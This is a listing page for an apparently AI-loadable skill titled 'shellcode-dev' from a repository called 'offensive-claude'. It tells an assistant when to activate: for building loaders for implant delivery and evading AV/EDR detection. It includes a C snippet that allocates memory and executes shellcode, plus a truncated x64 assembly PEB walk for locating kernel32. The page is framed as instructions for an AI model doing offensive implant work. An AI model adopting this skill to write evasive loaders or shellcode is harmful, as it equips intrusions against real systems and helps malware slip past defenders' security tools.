shellcode-dev

Featured

Use when writing position-independent shellcode or a loader — PEB walking, API hashing, null-byte avoidance, encoders, loaders, PE-to-shellcode conversion, cross-platform shellcode

API & Backend 382 stars 66 forks Updated 5 days ago MIT

Install

View on GitHub

Quality Score: 95/100

Stars 20%
86
Recency 20%
100
Frontmatter 20%
70
Documentation 15%
100
Issue Health 10%
80
License 10%
100
Description 5%
100

Skill Content

# Shellcode Development ## When to Activate - Writing custom x86/x64 shellcode - Implementing position-independent code (PIC) - Building shellcode loaders for implant delivery - Evading AV/EDR static detection - Converting PE files to shellcode - Cross-platform shellcode development ## Execution Pattern (Allocate-Write-Execute) Avoid direct `PAGE_EXECUTE_READWRITE` — prefer two-step: ```c // 1. Allocate with RW char *dest = VirtualAlloc(NULL, size, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE); // 2. Write shellcode memcpy(dest, shellcode, size); // 3. Switch to RX (no write permission) VirtualProtect(dest, size, PAGE_EXECUTE_READ, &old); // 4. Execute ((void(*)())dest)(); ``` ## Position-Independent Code (PIC) | Method | Platform | Notes | |--------|----------|-------| | Call/Pop | Windows | Push next addr, pop into register | | FPU state (fstenv) | Windows | Saves instruction pointer | | SEH | Windows | Exception handler stores EIP | | RIP-relative | x64 | `lea rax, [rip+offset]` | | GOT | Linux | Global Offset Table | | VDSO | Linux | Kernel-provided shared object | ## Windows API Resolution (PEB Walk) ```nasm ; x64 PEB walk to find kernel32.dll base find_kernel32: xor rcx, rcx mov rax, gs:[rcx + 0x60] ; RAX = PEB mov rax, [rax + 0x18] ; RAX = PEB->Ldr mov rsi, [rax + 0x20] ; RSI = InMemoryOrderModuleList lodsq ; skip first entry (exe) xchg rax, rsi lodsq ; skip ntdll...

Details

Author
hypnguyen1209
Repository
hypnguyen1209/offensive-claude
Created
4 months ago
Last Updated
5 days ago
Language
Python
License
MIT

Bundled in these plugins

Similar Skills

Semantically similar based on skill content — not just same category